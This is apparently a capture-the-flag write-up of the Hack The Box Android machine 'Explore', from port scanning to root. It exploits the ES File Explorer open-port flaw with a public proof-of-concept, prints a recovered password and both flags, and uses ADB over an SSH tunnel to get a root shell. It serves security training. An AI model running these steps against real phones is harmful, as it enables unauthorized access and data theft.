Explore

Name: Explore
Release Date: 26 Jun 2021
Retire Date: 30 Oct 2021
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
JoshSH 00 days, 00 hours, 03 mins, 27 seconds
jkr 00 days, 00 hours, 18 mins, 56 seconds
Creator: bertolis
Pentest Workstation PDF: Explore.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.247

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

Mirai

We have SSH (TCP 2222), FREECIV/ADB (TCP 5555), and HTTP Bukkit JSONAPI (TCP 59777) that are the major ports that we need to look at right now.  Gobuster found several pages and directories that could be interesting.

 

gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.247:59777

  
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ gobuster dir -u http://10.10.10.247:59777 -w /usr/share/dirb/wordlists/big.txt -o gobusterExplore.out           
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.247:59777
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/17 08:41:32 Starting gobuster in directory enumeration mode
===============================================================
/acct                 (Status: 301) [Size: 65] [--> /acct/]
/bin                  (Status: 301) [Size: 63] [--> /bin/] 
/cache                (Status: 301) [Size: 67] [--> /cache/]
/config               (Status: 301) [Size: 69] [--> /config/]
/d                    (Status: 301) [Size: 59] [--> /d/]     
/data                 (Status: 301) [Size: 65] [--> /data/]  
/dev                  (Status: 301) [Size: 63] [--> /dev/]   
/etc                  (Status: 301) [Size: 63] [--> /etc/]   
/init                 (Status: 403) [Size: 31]               
/lib                  (Status: 301) [Size: 63] [--> /lib/]   
/mnt                  (Status: 301) [Size: 63] [--> /mnt/]   
/oem                  (Status: 301) [Size: 63] [--> /oem/]   
/proc                 (Status: 301) [Size: 65] [--> /proc/]  
/product              (Status: 301) [Size: 71] [--> /product/]
/sbin                 (Status: 301) [Size: 65] [--> /sbin/]   
/storage              (Status: 301) [Size: 71] [--> /storage/]
/sys                  (Status: 301) [Size: 63] [--> /sys/]    
/system               (Status: 301) [Size: 69] [--> /system/] 
/vendor               (Status: 301) [Size: 69] [--> /vendor/] 
                                                              
===============================================================
2022/01/17 08:56:26 Finished
===============================================================

Researching 5555 and 59777, we can discover ES File Explorer and it's information and vulnerabilities. Two great resources for those two ports are:

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447

https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

 

Clone the exploit repo and check the README.md file to see what commands can be run.  To save time, the one we need is:

 

python3 poc.py --ip=10.10.10.247 -c listPics then

python3 poc.py --ip=10.10.10.247 -g /storage/emulated/0/DCIM/creds.jpg

Open the creds.jpg file and you'll have Kristi's login credentials. Apparently, having a picture of the quintessential "post-it note" is better than just the post-it note..... (PASSWORD MANAGERS!!! I'm better now). At least it's a halfway decent password, so there's that.

 

Kristi:Kr1sT!5h@Rp3xPl0r3!

This is obviously a phone, in case the ES File Explore wasn't clear :D Now we have to figure out how to escalate to the phone's version of root (which if I recall is still root). The problem is that normal Linux enumeration scripts aren't going to work correctly AND we still have to find the user.txt flag.  Time to go old school manual. After searching the file system, I found a few things. First, there's an SD card in this phone and the user flag is on it! 

 

:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

 

Now, if you recall port 5555 ADB was filtered, but what if we could utilize port tunneling to access it?  

 

ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222

 

Then, we "should" be able to use adb connect to get another shell, hopefully as root, but we'll see.

 

┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555
 

┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb devices      
List of devices attached
emulator-5554   device
localhost:5555  device

 

Notice there are two "devices" attached.  We need to specify which one we want adb to connect to the shell on. 

 

┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb -s localhost:5555 shell                                                                                                    1 ⨯
x86_64:/ $ whoami                                                                                                                     
shell
x86_64:/ $ su
:/ # whoami
root
 

Gotcha!!! Now we search for root.txt and this phone will be toast.

 

:/ # find / -name root.txt

:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5

 

This was a completely different style of box/phone/thing....  But hey, another one down!